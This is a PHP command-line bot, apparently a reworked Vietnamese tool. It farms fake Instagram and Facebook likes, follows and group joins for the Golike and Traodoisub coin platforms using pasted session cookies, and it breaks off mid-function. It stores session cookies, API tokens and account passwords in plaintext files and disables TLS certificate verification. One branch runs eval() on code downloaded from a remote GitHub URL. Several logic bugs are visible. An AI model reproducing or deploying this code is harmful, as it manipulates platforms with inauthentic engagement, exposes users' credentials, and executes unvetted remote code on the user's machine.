
/*** [ Rework By VuHoang ] ***/
# Donate Me: 0399498820 MOMO
if (file_exists("CookieLuuTam.txt")){unlink("CookieLuuTam.txt");}
//error_reporting(0);
system('clear');
Echo "Loading...\r";
$red="\033[1;31m"; $end="\033[0m";$black="\033[0;30m";$blackb="\033[1;30m";$white="\033[0;37m";$whiteb="\033[1;37m";$redb="\033[1;31m";$green="\033[0;32m";$greenb="\033[1;32m";$yellow="\033[0;33m";$yellowb="\033[1;33m";$syan="\033[1;36m";$blue="\033[0;34m";$blueb="\033[1;34m";$purple="\033[0;35m";$purpleb="\033[1;35m";$lightblue="\033[0;36m";$lightblue="\033[1;35m";$lightblueb="\033[1;36m";$red="\033[1;31m";$green="\033[1;32m";$yellow="\033[1;33m";$blud="\033[1;34m";$res="\033[1;35m";$nau="\033[1;36m";$trang="\033[1;37m";$cam= "\e[38;5;208m";$lavender="\033[1;95m";$peach="\033[1;96m";$coral="\033[1;97m";$charcoal="\033[1;98m";$maroon="\033[1;99m";$gold="\033[1;100m";
$teal="\033[1;101m";
$indigo="\033[1;102m";
$rose="\033[1;103m";
$loiii = 0;
echo "Loading (4)   \r";
function ccc($vanban){$str = strlen($vanban);

 for($i=0;$i<=$str;$i++){echo $vanban[$i];usleep(1000);}
return 0;}
$icon1= "\033[1;37m•[✩]➭ \033[1;37m";
$icon2= "\033[1;33m•[۞] ➭ :\033[1;37m";
$banner = "\033[1;33m╔══════════════════════════════════════════════════════════════════════╗\n║   \033[38;5;225m╔╗ ╔═╗   ╔╗ ╔═╗    \033[38;5;196m【】                                           \033[1;33m ║\n║\033[1;33m   \033[38;5;189m║║ ║ ╝   ║║ ║ ╝    \033[38;5;197m【】 \033[38;5;119m 『 —————————————————————————————————————— \033[1;33m║\n\033[1;33m║\033[38;5;153m   ║║ ║║    ║║ ║║     \033[38;5;198m【】 \033[3;37m\033[38;5;087m    Made by: \033[3;37mKhang x Khôi     \033[0m             \033[1;33m║\n\033[1;33m║ \033[38;5;117m  ║║══╝    ║║══╝     \033[38;5;199m【】     \033[3;37m\033[38;5;039mNhóm zalo: \033[1;37mhttps://zalo.me/g/zvzsrw324 \033[0m\033[1;33m║\n\033[1;33m║ \033[38;5;081m  ║║══╗    ║║══╗     \033[38;5;200m【】     \033[3;37m\033[38;5;45mMua key vip: \033[1;37m0377205462 \033[0m               \033[1;33m║\n\033[1;33m║\033[38;5;045m   ║║ ║║    ║║ ║║     \033[38;5;201m【】  \033[3;37m\033[38;5;051m   Phiên bản:\033[1;37m V3.2  \033[0m                      \033[1;33m║\n\033[1;33m║ \033[38;5;51m  ║║ ║ ╗   ║║ ║ ╗    \033[38;5;206m【】\033[38;5;119m   ————————————————————————————————————— 』 \033[1;33m║\n\033[1;33m║  \033[38;5;123m ╚╝ ╚═╝   ╚╝ ╚═╝    \033[38;5;207m【】					       \033[1;33m║\n\033[1;33m╚══════════════════════════════════════════════════════════════════════╝\n\033[1;37m$greenb                     Ip của bạn là Xxx.Xxx.X.X\n";
system('clear');
echo $banner;if ($ip_cu != $ip){
file_put_contents($file_luu_ip, $ip);
echo "$redb"."Đã Lưu ip \n";}
echo "$lightblueb"."Vui lòng chọn chế độ\n";
//echo $icon1."[1] Auto Tiktok(Golike) \n";
echo $icon1."[2] Auto Instagram(Golike)\n";
//echo $icon1."[3] Lịch sử jobs đã làm (Golike)\n";
//echo $icon1."[4] Tool Thử nghiệm (VIP)\n";
$dunglai = 0;
echo $icon1."[5] Tool Trao Đổi Sub Đa Cookie Facebook\n";
while(TRUE){
	echo $icon2;
	$chon = trim(fgets(STDIN));
//	if ($chon == 1) {break;}
	if ($chon == 2) {break;}
//	if ($chon == 3) {break;}
//	if ($chon == 4) {break;}
	if ($chon == 5) {break;}
		echo $icon2."Chọn sai vui lòng chọn lại \n";
}


if ($chon == 2) {
echo $green."Đang vô tool vui lòng đợi ";
error_reporting(0);
system('clear');
$loiii = 0;
date_default_timezone_set("Asia/Ho_Chi_Minh");
$Ngay=`date "+%d/%m/%Y"`;
function delay($delay) {
 for ($time = $delay; $time > -1; $time--) { echo $lightblueb." Vui lòng đợi $time để làm nhiêm vụ  \r";sleep(1);
 }}
function like($id,$cookie,$csrftoken){
	$url = "https://www.instagram.com/api/v1/web/likes/".$id."/like/";
	$header = array(
	"Host:www.instagram.com",
	 "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; CPH1912 Build/O11019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/111.0.5563.57 Mobile Safari/537.36",
	 "viewport-width:360",
	 "content-type:application/x-www-form-urlencoded",
	"acccept:*/*",
	"x-requested-with:XMLHttpRequest",
	"x-asbd-id:198387",
	"x-csrftoken:".$csrftoken,
	"sec-ch-prefers-color-scheme:light",
	"x-ig-app-id:1217981644879628",
	"x-asbd-id:198387",
	"cookie:".$cookie,
	
	);
	$text = post_type3($url, $header);

	if ( $text["status"] == "ok" ){
		echo " LIKE Thành Công    \r";
		return "ok";
	}else if ( $text["spam"] ){
		return "die";
	}else{
		 print_r($text);
		return "ko";
		
	}
}

function follow($id,$cookie,$csrftoken){
	$url = "https://www.instagram.com/api/v1/friendships/create/".$id."/";
	$tsm = array (
	"Host:www.instagram.com",
	"user-agent:Mozilla/5.0 (Linux; Android 8.1.0; CPH1912 Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36",
	"viewport-width:360",
	"content-type:application/x-www-form-urlencoded",
	"acccept:*/*",
	"x-requested-with:XMLHttpRequest",
	"x-asbd-id:129477",
	"x-csrftoken:".$csrftoken,
	"sec-ch-prefers-color-scheme:light",
	"x-ig-app-id:1217981644879628",
	"origin:https://www.instagram.com",
	"cookie:".$cookie,
	);
	$data = "container_module=profile&nav_chain=PolarisProfileRoot%3AprofilePage%3A1%3Avia_cold_start&user_id=".$id;
	$text = post_type2($url, $tsm, $data);
	if ( $text["status"] == "ok" ){
		echo " FOLLOW Thành Công    \r";
		return "ok";
	}else if ( $text["spam"] ){
		return "die";
	}else{
		return "ko";
	}
}

function get_info_ig($cookie){
  #Xu_ly_cookie
  if (!strpos($cookie, 'ds_user_id') || !strpos($cookie, 'csrftoken')){
   return "cookie_err";
  }
  $idig = trim(explode(';',explode('ds_user_id=', $cookie)[1])[0]);
  $csrftoken = trim(explode(';',explode('csrftoken=', $cookie)[1])[0]);
  #End_xu_ly
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, 'https://i.instagram.com/api/v1/users/'.$idig.'/info/');
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
  curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');
  $headers = array();
  $headers[] = 'Authority: i.instagram.com';
  $headers[] = 'Sec-Ch-Ua: \"Google Chrome\";v=\"93\", \" Not;A Brand\";v=\"99\", \"Chromium\";v=\"93\"';
  $headers[] = 'Sec-Ch-Ua-Mobile: ?0';
  $headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36';
  $headers[] = 'Acccept: */*';
  $headers[] = 'X-Asbd-Id: 198387';
  $headers[] = 'Sec-Ch-Ua-Platform: \"Windows\"';
  $headers[] = 'X-Ig-App-Id: 936619743392459';
  $headers[] = 'Origin: https://www.instagram.com';
  $headers[] = 'Sec-Fetch-Site: same-site';
  $headers[] = 'Sec-Fetch-Mode: cors';
  $headers[] = 'Sec-Fetch-Dest: empty';
  $headers[] = 'Referer: https://www.instagram.com/';
  $headers[] = 'Acccept-Language: en-US,en;q=0.9';
  $headers[] = 'Cookie: '.$cookie;
  curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  $result = curl_exec($ch);
  if (curl_errno($ch)) {
  echo 'unknown\n';
  }
  curl_close($ch);

  if (!strpos($result, '"status":"ok"')){
 return "cookie_err";
  }
  $data = json_decode($result, true)['user'];
  $idig = $data['pk'];
  $username = $data['username'];
  $namefull = $data['full_name'];
  echo "\033[1;33mĐăng nhập thành công \033[1;32m $namefull \033[1;33mUsername:\033[1;32m $username\n".$whiteb;
  
 return $idig.'|'.$username.'|'.$cookie.'|'.$csrftoken;
 
}


function nhan_job($authorization,$id,$id_job){
	$data = '{"instagram_users_advertising_id":'.$id_job.',"instagram_acccount_id":'.$id.',"async":true,"data":null}';
	$url = "https://dev.golike.net/api/advertising/publishers/instagram/complete-jobs";
	$head = array(
	"Host:dev.golike.net",
	"content-length:96",
	"acccept:application/json, text/plain, */*",
	"t:VFZSWk5FOVVVWGROUkUxNVQwRTlQUT09",
	"authorization:".$authorization,
	"user-agent:Mozilla/5.0 (Linux; Android 8.1.0; CPH1912 Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36",
	"content-type:application/json;charset=UTF-8",
	"origin:https://app.golike.net",
	);
	$tt = post_type2($url, $head, $data);
	
	return $tt;
}
function get_job($authorization,$id){
	$url = "https://dev.golike.net/api/advertising/publishers/instagram/jobs?instagram_acccount_id=".$id."&data=null";
	$head = array (
	"Host:dev.golike.net",
	"acccept:application/json, text/plain, */*",
	"t:VFZSWk5FOVVVWGROUkVsM1RtYzlQUT09",
	"authorization:".$authorization,
	"user-agent:Mozilla/5.0 (Linux; Android 8.1.0; CPH1912 Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36",
	"content-type:application/json;charset=utf-8",
	"origin:https://app.golike.net",
	);
	$tt = post_type($url, $head);
	return $tt;
}
function get_id($authorization){
	$_SESSION['id'] = [] ;
	$_SESSION['ig'] = [] ;
	$url = "https://sv5.golike.net/api/instagram-acccount";
	$header = array(
	"Host:sv5.golike.net",
	"acccept:application/json, text/plain, */*",
	"t:VFZSWk5FOVVVWGROUkVsM1RtYzlQUT09",
	"authorization:".$authorization,
	"user-agent:Mozilla/5.0 (Linux; Android 8.1.0; CPH1912 Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36",
	"content-type:application/json;charset=utf-8",
	"origin:https://app.golike.net",
	);
	$tt = post_type($url, $header);
	if ($tt["succcess"]== 200 ){
		$sl = count($tt["data"]);
		for ($so = 0; $so < $sl ; $so++) {
		$id = $tt["data"][$so]["id"];
		$instagram_username = $tt["data"][$so]["instagram_username"];
		
		
		array_push($_SESSION['ig'], $instagram_username);
		array_push($_SESSION['id'], $id);
		
		}
		
	}else{
		echo " GET THÔNG TIN CẤU HÌNH THẤT BẠI \r";
	}
	
}
function post_type2($url, $tsm, $data){
$mr = curl_init();
curl_setopt_array($mr, array(
  CURLOPT_PORT => "443",
  CURLOPT_URL => "$url",
  CURLOPT_RETURNTRANSFER => true,
  CURLOPT_SSL_VERIFYPEER => false,
  CURLOPT_TIMEOUT => 30,
  CURLOPT_CUSTOMREQUEST => "POST",
  CURLOPT_POSTFIELDS => $data,
  CURLOPT_HTTPHEADER => $tsm));
$mr2 = curl_exec($mr); curl_close($mr);
$js = json_decode($mr2,true);
return $js;
}
function post_type($url, $tsm){
$mr = curl_init();
curl_setopt_array($mr, array(
  CURLOPT_PORT => "443",
  CURLOPT_URL => "$url",
  CURLOPT_RETURNTRANSFER => true,
  CURLOPT_SSL_VERIFYPEER => false,
  CURLOPT_TIMEOUT => 30,
  CURLOPT_CUSTOMREQUEST => "GET",
  CURLOPT_HTTPHEADER => $tsm));
$mr2 = curl_exec($mr); curl_close($mr);
$js = json_decode($mr2,true);
return $js;
}

function post_type3($url, $tsm){
	##$ip = explode(':',$ipp);
$mr = curl_init();
curl_setopt_array($mr, array(
  CURLOPT_PORT => "443",
  CURLOPT_URL => "$url",
  CURLOPT_RETURNTRANSFER => true,
  CURLOPT_SSL_VERIFYPEER => false,
  CURLOPT_TIMEOUT => 30,
  ##CURLOPT_PROXY => $ip[0],
  ##CURLOPT_PROXYPORT => $ip[1],
  CURLOPT_CUSTOMREQUEST => "POST",
  CURLOPT_HTTPHEADER => $tsm));
$mr2 = curl_exec($mr); curl_close($mr);
$js = json_decode($mr2,true);
return $js;
}
$van = $icon2;
ccc ($banner);
If (file_exists("authorizations.txt")){
echo $icon1. "Bạn có muốn dùng lại Authorization ? ". $trang . "(Enter để dùng lại, N để thay)\n$van ";
$trl = trim(fgets(STDIN)); 
if ($trl == "N" or $trl == "n") {echo $van." Authorization : ";
$authorization = trim(fgets(STDIN));} else {
  $myfile = fopen("authorizations.txt", "r");
 $line = fgets($myfile);
 $authorization = $line;
fclose($myfile);}}
else {
echo $van." Authorization : ";

$authorization = trim(fgets(STDIN));}
echo $icon1.$lightblueb."Đang Login\r";
$url = "https://sv5.golike.net/api/users/me";
$tsm = array(
"Host:sv5.golike.net",
"acccept:application/json, text/plain, */*",
"authorization:".$authorization,
"user-agent:Mozilla/5.0 (Linux; Android 8.1.0; CPH1912 Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.130 Mobile Safari/537.36",
"content-type:application/json;charset=utf-8",
"origin:https://app.golike.net",
);
$home = post_type($url, $tsm);

if ($home["succcess"]== 200 ){
	echo $icon1.$greenb."ĐĂNG NHẬP THÀNH CÔNG \n";
	$username = $home["data"]["username"];
	$coin = $home["data"]["coin"];
	$myfile = fopen("authorizations.txt", "w");
  $txt = $authorization;
 fwrite($myfile, $txt);
 fclose($myfile);
}else{
	echo $icon1.$redb."ĐĂNG NHẬP THẤT BẠI \n";
	exit;
}

$gop_data = [];
system('clear');
ccc ($banner);
echo $van." Acccount : ".$trang.$username." \n";
echo $van." SỐ DƯ : ".$trang.$coin." \n";
echo $trang."= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =\n";
echo $van." Nhập Delay : ".$trang;
$delay = trim(fgets(STDIN));
echo $van." Bao Nhiêu Job Thì Đổi Accc : ".$trang;
$doi = trim(fgets(STDIN));
$file_luu_ck = 'CookieGolikeIG.txt';
if (file_exists($file_luu_ck))
{echo $icon2." Bạn có muốn dùng lại cookie cũ? (Y/N):\n$icon1 "; 
$cookiecu11 = trim(fgets(STDIN)); }
else { $cookiecu11 = "n";};
if ($cookiecu11 == "y" or $file_luu_ck == "Y") {
for ($time = 0; $time <= 99999999999; $time++) {
  $file_ck = fread(fopen($file_luu_ck, "r"), filesize($file_luu_ck));
 $nhap1 = explode("|",$file_ck)[$time];
 if ($nhap1 == " ") {break;}
				$ck = get_info_ig($nhap1);
				$giainen = explode('|', $ck);
				if (!$giainen){
					echo $van." Cookie Không Hợp Lệ \n";
				}else{
					$id_instagram = $giainen[1];
					$r = get_id($authorization);
					$tk_so = array_search($id_instagram, $_SESSION['ig']);
					fwrite(fopen("CookieLuuTam.txt", "a"), $nhap1."| ");
				
					$id = $_SESSION['id'][$tk_so];
					$tong = $ck.'|'.$id;
					array_push($gop_data, $tong);
				}
				
  }
  $cktam = file_get_contents('CookieLuuTam.txt');
fwrite(fopen($file_luu_ck, "w"), $cktam);
  echo $icon1."Đã xoá nhưng cookie Die\n";
 echo "Bạn Có muốn thêm Cookie? (Y/N) \n $icon2"; 
 $themcookie = trim(fgets(STDIN));
 if ($themcookie == "y" or $themcookie == "Y") {
   while(true){
	$s= $s+1 ;
	echo $van." Cookie Instagram Thứ $s : ".$vang;
	$nhap = trim(fgets(STDIN));
	if ( $nhap == ""){
	  fwrite(fopen($file_luu_ck, "a"), " ");
	 	break;
	}else{
### echo cookie 
		$ck = get_info_ig($nhap);
		$giainen = explode('|', $ck);
		if (!$giainen){
			echo $van." Cookie Không Hợp Lệ \n";
			continue ;
		}else{
			$id_instagram = $giainen[1];
			$r = get_id($authorization);
			$tk_so = array_search($id_instagram, $_SESSION['ig']);
			$id = $_SESSION['id'][$tk_so];
			if (!$id){
				echo $van." TÀI KHOẢN CHƯA ĐƯỢC CẤU HÌNH VÀO GOLIKE \n";
				continue;
			}
			 fwrite(fopen($file_luu_ck, "a"), $nhap."|");
			$tong = $ck.'|'.$id;
			array_push($gop_data, $tong);
			
		}
	}
 }
 }
 
				system ('clear');ccc ($banner);
	  echo $greenb."\n| STT |". $cam."Thời gian|".$yellow." Loại |". $trang. " Id Jobs |".$red. "Trạng thái |".$lightblueb." Tên tài khoản | \n";
			}
if ($cookiecu11== "N" or $cookiecu11 == 'n') {
  unlink($file_luu_ck);
while(true){
	$s= $s+1 ;
	echo $van." Cookie Instagram Thứ $s : ".$vang;
	$nhap = trim(fgets(STDIN));
	if ( $nhap == ""){
	  fwrite(fopen($file_luu_ck, "a"), " ");
	 	break;
	}else{
### echo cookie 
		$ck = get_info_ig($nhap);
		$giainen = explode('|', $ck);
		if (!$giainen){
			echo $van." Cookie Không Hợp Lệ \n";
			continue ;
		}else{
			$id_instagram = $giainen[1];
			$r = get_id($authorization);
			$tk_so = array_search($id_instagram, $_SESSION['ig']);
			$id = $_SESSION['id'][$tk_so];
			if (!$id){
				echo $van." TÀI KHOẢN CHƯA ĐƯỢC CẤU HÌNH VÀO GOLIKE \n";
				continue;
			}
			 fwrite(fopen($file_luu_ck, "a"), $nhap."|");
			$tong = $ck.'|'.$id;
			array_push($gop_data, $tong);
			
		}
	}
}system ('clear');ccc ($banner);
	  echo $greenb."\n| STT |". $cam."Thời gian|".$yellow." Loại |". $trang. " Id Jobs |".$red. "Trạng thái |".$lightblueb." Tên tài khoản | \n";
}

 while(true) {
	foreach ($gop_data as $haha) {
		if (!$haha){
			break;
		}
		$giainen = explode('|', $haha);
		$idig = $giainen[0];
		$id_instagram = $giainen[1];
		$cookie = $giainen[2];
		$csrftoken = $giainen[3];
		$id_gl = $giainen[4];
		####tìm job
		while(true){
			$list = get_job($authorization,$id_gl);
			
			if ($list["status"] == 200 ){
				$id_nhan = $list["data"]["id"];
				$object_id = $list["data"]["object_id"];
				$type = $list["data"]["type"];
				if ( $type == "follow"){
					$fl = follow($object_id,$cookie,$csrftoken);
					if ($fl = "ok"){
						echo $van." FOLLOW Thành Công     \r";
						sleep(1);
					}else if($fl == 'die'){
						echo $van." Tài Khoản Bị Block    \r";
						$tk_so = array_search($haha, $gop_data);
						unset($data_ig[$tk_so]);
						break;
					}else{
						echo $van." LỖI  \r";
						
						
					}
				}else if( $type == "like"){
					$id_like = $list["data"]["object_data"];
					$js = json_decode($id_like,true);
					$id_l = $js["id"];
					
					$like = like($id_l,$cookie,$csrftoken);
					
					if ($like == 'die'){
						echo $van." Tài Khoản Bị Block   \r";
						$tk_so = array_search($haha, $gop_data);
						unset($data_ig[$tk_so]);
						break;
					}
					
				}else{
					echo $van." KHÔNG THỂ LÀM NHIỆM VỤ $type \r";
					continue;
				}
				$nhan_coin = nhan_job($authorization,$id_gl,$id_nhan);
				if ($nhan_coin["status"]== 200 ){
					$type_2 = $nhan_coin["data"]["type"];
					$gio = date("H:i");
					$tt = $tt+1;
					$p= $greenb."| $tt |". $cam."$gio|".$yellow." $type_2 |". $trang. "$object_id|".$red. "Hoàn thành|".$lightblueb." $id_instagram | \n";ccc($p);
					if ($tt % $doi == 0){
						break;
					}
					delay($delay) ;
				}else{
					$l = $nhan_coin["message"];
					echo $van." NHẬN THẤT BẠI $l  \r";
					delay(10) ;
					continue;
				}
				
			}else{
for ($time = 10; $time > -1; $time--) {
  echo "\r\033[1;93m Hết nhiệm vụ,lấy nhiện vụ mới sau : \033[1;93m $time \r";
   sleep(1);}
				break;
			}
			
		}
		
	}
 }
}
if ($chon == 3) {
  system ('clear');
  echo $banner;
  echo $yellowb."\n| Tên tài khoản |   Thời gian   |  Loại  | Id Jobs |  Id Tiktok |  Trạng thái | Địa chỉ Ip |\n";
  $data17 =file_get_contents('DataaOutputTiktok.txt');
ccc ("$data17");}
if ($chon == 4) { if ($activeb == 1 or $activeb1 == 1)
{ system ('clear');
eval (file_get_contents('https://raw.githubusercontent.com/khoido1303/khoido1303/main/sever.txt'));
}
else {echo "Chỉ Vip mới vô được";}
}
if ( $chon == 5 ) {
  
  error_reporting(0);
session_start();
date_default_timezone_set('Asia/Ho_Chi_Minh');
/***[ Color ]***/
$xnhac = "\033[1;36m";
$do = "\033[1;31m";
$luc = "\033[1;32m";
$vang = "\033[1;33m";
$xduong = "\033[1;34m";
$hong = "\033[1;35m";

function thongtin($id, $cookie, $useragent)
{

 $ch = curl_init();
 $header = array(
  "Host:m.facebook.com",
  "user-agent:$useragent",
  "acccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  "cookie:$cookie",
 );
 $linkbv = 'https://m.facebook.com/' . $id . '/about';
 curl_setopt($ch, CURLOPT_URL, $linkbv);
 $head[] = "Connection: keep-alive";
 $head[] = "Keep-Alive: 300";
 $head[] = "Acccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
 $head[] = "Acccept-Language: en-us,en;q=0.5";
 curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14');
 curl_setopt($ch, CURLOPT_ENCODING, '');
 curl_setopt($ch, CURLOPT_COOKIE, $cookie);
 curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
 curl_setopt($ch, CURLOPT_TIMEOUT, 60);
 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
 curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect
 :'));
 $page = curl_exec($ch);
 $page1 = json_decode($page);
 return $page;
}
function logintds()
{
 $data   = fread(fopen("TaiKhoanTDS.txt", "r"), filesize("TaiKhoanTDS.txt"));
 $_SESSION["username"] = explode('|', $data)[0];
 $_SESSION['password'] = explode('|', $data)[1];
 $ch = curl_init();
   
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_URL, 'https://traodoisub.com/scr/login.php');
 curl_setopt($ch, CURLOPT_COOKIEJAR, "TDS.txt");
 curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Linux; Android 10; SM-J600G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36');
 
 $login = array('username' => $_SESSION['username'], 'password' => $_SESSION['password'], 'submit' => ' Đăng Nhập');
 curl_setopt($ch, CURLOPT_POST, count($login));
 curl_setopt($ch, CURLOPT_POSTFIELDS, $login);
 curl_setopt($ch, CURLOPT_COOKIEFILE, "TDS.txt");
 $source = curl_exec($ch);
 curl_close($ch);
}
function group_fb($id, $useragent, $cookie)
{
 $ch = curl_init();
 if (strpos($id, '_')) {
  $uid = explode('_', $id, 2);
  $id2 = 'story.php?story_fbid=' . $uid[1] . '&id=' . $uid[0];
 } else {
  $id2 = $id;
 }

 $header = array(
  "Host:mbasic.facebook.com",
  "user-agent:$useragent",
  "acccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  "cookie:$cookie",
 );
 
 $linkbv = 'https://mbasic.facebook.com/groups/' . $id2;
 curl_setopt($ch, CURLOPT_URL, $linkbv);
 $head[] = "Connection: keep-alive";
 $head[] = "Keep-Alive: 300";
 $head[] = "Acccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
 $head[] = "Acccept-Language: en-us,en;q=0.5";
 curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14');
 curl_setopt($ch, CURLOPT_ENCODING, '');
 curl_setopt($ch, CURLOPT_COOKIE, $cookie);
 curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
 curl_setopt($ch, CURLOPT_TIMEOUT, 60);
 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
 curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect
  :'));
 // json_decode(curl_exec($ch), true);
 $post = curl_exec($ch);


 $link = explode('<form method="post" action="/a/group/join/?group_id=', $post)[1];
 $link = explode('"', $link)[0];
 $link = html_entity_decode($link);
 $link = "https://mbasic.facebook.com/a/group/join/?group_id=" . $link;
 // echo $link;
 // die();
 $linkreac1 = $link;
 $header = array(
  "Host:mbasic.facebook.com",
  "user-agent:$useragent",
  "acccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  "referer:$linkbv",
  "cookie:$cookie",
 );
 
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $linkreac1);
 $head[] = "Connection: keep-alive";
 $head[] = "Keep-Alive: 300";
 $head[] = "Acccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
 $head[] = "Acccept-Language: en-us,en;q=0.5";
 curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14');
 curl_setopt($ch, CURLOPT_ENCODING, '');
 curl_setopt($ch, CURLOPT_COOKIE, $cookie);
 curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
 curl_setopt($ch, CURLOPT_TIMEOUT, 60);
 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
 curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
 $page = curl_exec($ch);
 $aa = $page;

 return $aa;
}
function follow($idtest, $cookie)
{
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, 'https://mbasic.facebook.com/' . $idtest . '?_rdr');
  $head[] = "Connection: keep-alive";
  $head[] = "Keep-Alive: 300";
  $head[] = "upgrade-insecure-requests: 1";
  $head[] = "sec-ch-ua-mobile: ?0";
  $head[] = "sec-fetch-user: ?1";
  $head[] = "sec-fetch-site: none";
  $head[] = "sec-fetch-dest: document";
  curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36');
  curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_REFERER, true);
  curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  $acccess = curl_exec($ch);
  $url1 = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
  if (strpos($acccess, '/a/subscribe.php?') !== false) {
 $haha = explode('<a href="', $acccess);
 for ($v = 0; $v < count($haha); $v++) {
   if (strpos($haha[$v], '/a/subscribe.php?') !== false) {
  $haha2 = explode('" class=', $haha[$v])[0];
  break;
   }
 }
 $link2 = html_entity_decode($haha2);

 curl_setopt($ch, CURLOPT_URL, 'https://mbasic.facebook.com' . $link2 . '&_rdr');
 curl_setopt($ch, CURLOPT_REFERER, $url1);
 curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
 $fl = curl_exec($ch);

 curl_close($ch);

  } else {
 curl_close($ch);
 return 'id ' . $idtest . ' loi';

  }
}

function like($acccess_token, $id, $cookie)
{
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, 'https://graph.facebook.com/' . $id . '/likes');
 $head[] = "Connection: keep-alive";
 $head[] = "Keep-Alive: 300";
 $head[] = "authority: m.facebook.com";
 $head[] = "cccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
 $head[] = "acccept-language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5";
 $head[] = "cache-control: max-age=0";
 $head[] = "upgrade-insecure-requests: 1";
 $head[] = "acccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
 $head[] = "sec-fetch-site: none";
 $head[] = "sec-fetch-mode: navigate";
 $head[] = "sec-fetch-user: ?1";
 $head[] = "sec-fetch-dest: document";
 curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36');
 curl_setopt($ch, CURLOPT_ENCODING, '');
 curl_setopt($ch, CURLOPT_COOKIE, $cookie);
 curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
 curl_setopt($ch, CURLOPT_TIMEOUT, 60);
